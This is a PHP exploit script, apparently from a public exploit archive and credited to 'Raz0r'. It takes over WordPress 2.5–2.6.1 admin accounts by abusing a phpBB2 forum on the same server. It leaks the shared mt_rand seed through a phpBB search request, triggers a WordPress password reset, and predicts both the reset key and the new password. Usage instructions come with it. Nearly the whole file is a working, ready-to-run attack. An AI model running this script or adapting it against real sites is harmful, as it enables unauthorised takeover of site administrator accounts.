<?php
echo "------------------------------------------------------------------\n";
echo "Wordpress 2.5 <= 2.6.1 through phpBB2 Reset Admin Password Exploit\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "------------------------------------------------------------------\n";

if ($_SERVER['argc']<3) {
	echo "USAGE:\n";
	echo "~~~~~~\n";
	echo "php {$_SERVER['argv'][0]} [wp] [phpbb] OPTIONS\n\n";
	echo "[wp]    - target server where Wordpress is installed\n";
	echo "[phpbb] - path to phpBB (must be located on the same server)\n\n";
	echo "OPTIONS:\n";
	echo "--wp_user=[value] (default: admin)\n";
	echo "--search=[value] (default: `site OR file`)\n";
	echo "--skipcheck (force exploit not to compare PHP versions)\n";
	echo "examples:\n";
	echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://site.com/forum/\n";
	echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://samevhost.com/forum/ --wp_user=lol\n";
	die;
}

set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);

$wp = $_SERVER['argv'][1];
$phpbb = $_SERVER['argv'][2];

for($i=3;$i<$_SERVER['argc'];$i++){
	if(strpos($_SERVER['argv'][$i],"--wp_user=")!==false) {
		list(,$wp_user) = explode("=",$_SERVER['argv'][$i]);
	}
	if (strpos($_SERVER['argv'][$i],"--search=")!==false) {
		list(,$search) = explode("=",$_SERVER['argv'][$i]);
	}

	if (strpos($_SERVER['argv'][$i],"--skipcheck")!==false) {
		$skipcheck=true;
	}
}

if(!isset($wp_user))$wp_user='admin';
if(!isset($search))$search='site OR file';

$wp_parts = @parse_url($wp);
$phpbb_parts = @parse_url($phpbb);

if(isset($wp_parts['host']))$wp_ip = gethostbyname($wp_parts['host']);else die("[-] Wrong parameter given\n");
if(isset($phpbb_parts['host']))$phpbb_ip = gethostbyname($phpbb_parts['host']);else die("[-] Wrong parameter given\n");

if($wp_ip!=$phpbb_ip) die("[-] Web apps must be located on the same server\n");

$phpbb_host = $phpbb_parts['host'];
if(isset($phpbb_parts['port']))$phpbb_port=$phpbb_parts['port']; else $phpbb_port=80;
if(isset($phpbb_parts['path']))$phpbb_path=$phpbb_parts['path']; else $phpbb_path="/";
if(substr($phpbb_path,-1,1)!="/")$phpbb_path .= "/";

$wp_host = $wp_parts['host'];
if(isset($wp_parts['port']))$wp_port=$wp_parts['port']; else $wp_port=80;
if(isset($wp_parts['path']))$wp_path=$wp_parts['path']; else $wp_path="/";
if(substr($wp_path,-1,1)!="/")$wp_path .= "/";

echo "[~] Connecting... ";
$sock = fsockopen($phpbb_ip,$phpbb_port);
if(!$sock)die("failed\n"); else echo "OK\n";


$packet = "GET {$wp_path}wp-login.php HTTP/1.0\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$resp='';
fputs($sock,$packet);
while(!feof($sock)) {
	$resp.=fgets($sock);
}
fclose($sock);


if(preg_match('@HTTP/1\.(0|1) 200 OK@i',$resp)){
	if(preg_match('@login\.css\?ver=([\d\.]+)\'@',$resp)) $wp26=true;
	else $wp26=false;
} else die("[-] Can't obtain wp-login.php\n");

if(!isset($skipcheck)) {
	echo "[~] Comparing PHP versions... ";
	$out=array();
	preg_match('@x-powered-by: *PHP/([\d\.]+)@i',$resp,$out);
	if(!isset($out[1]))die( "failed\n[-] Can't get PHP version\n");
	else {
		if(!(version_compare($out[1],'5.2.6') && version_compare(phpversion(),'5.2.6')) && !(!version_compare($out[1],'5.2.6') && !version_compare(phpversion(),'5.2.6')) ) {
			die("failed\n[-] Server's and local PHP versions are unacceptable\n");
		}
	}
	echo "OK\n";
}

$ock = fsockopen($phpbb_ip,$phpbb_port);
echo "[~] Sending request to $phpbb\n";

$data = "search_keywords=".urlencode($search)."&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200";
$packet = "POST {$phpbb_path}search.php?mode=results HTTP/1.1\r\n";
$packet.= "Host: {$phpbb_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;

fputs($ock, $packet);
sleep(5);

$resp='';
while(!feof($ock)) {
	$resp = fgets($ock);
	preg_match('@search.php\?search_id=(\d+)&amp;@',$resp,$search);
	if(isset($search[1])) {
		$search_id = (int)$search[1];
		echo "[+] search_id is $search_id\n";
		break;
	}
}

if(!isset($search_id)) die("[-] search_id Not Found, try the other --search param\n");

echo "[~] Sending request to $wp\n";

$data = "user_login=".urlencode($wp_user)."&wp-submit=Get+New+Password";

$packet = "POST {$wp_path}wp-login.php?action=lostpassword HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Referer: {$wp}/wp-login.php?action=lostpassword\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;

fputs($ock,$packet);

$seed = search_seed($search_id);
if($seed!==false) echo "[+] Seed is $seed\n";
else die("[-] Seed Not Found\n");
mt_srand($seed);
mt_rand();

if($wp26) $key = wp26_generate_password(20, false);
else  $key = wp_generate_password();

echo "[+] Activation key should be $key\
";

echo "[~] Sending request to activate password reset\n";

$packet = "GET {$wp_path}wp-login.php?action=rp&key={$key} HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";

fputs($ock,$packet);

while(!feof($ock)) {
	$resp .= fgets($ock);
}

if(preg_match('/(Invalid username or e-mail)|(пользователь отсутствует в базе данных)|(Неправильное имя пользователя)/i',$resp)) die("[-] Incorrect username for wordpress\n");
if(strpos($resp,'error=invalidkey')!==false) die("[-] Activation key is incorrect\n");

if($wp26) $pass = wp26_generate_password();
else  $pass = wp_generate_password();

echo "[+] New password should be $pass\n";

function search_seed($rand_num) {
	$max = 1000000;
	for($seed=0;$seed<=$max;$seed++){
		mt_srand($seed);
		$key = mt_rand();
		if($key==$rand_num) return $seed;
	}
	return false;
}

function wp26_generate_password($length = 12, $special_chars = true) {
	$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
	if ( $special_chars )
	$chars .= '!@#$%^&*()';

	$password = '';
	for ( $i = 0; $i < $length; $i++ )
	$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
	return $password;
}

function wp_generate_password() {
	$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
	$length = 7;
	$password = '';
	for ( $i = 0; $i < $length; $i++ )
	$password .= substr($chars, mt_rand(0, 61), 1);
	return $password;
}
?>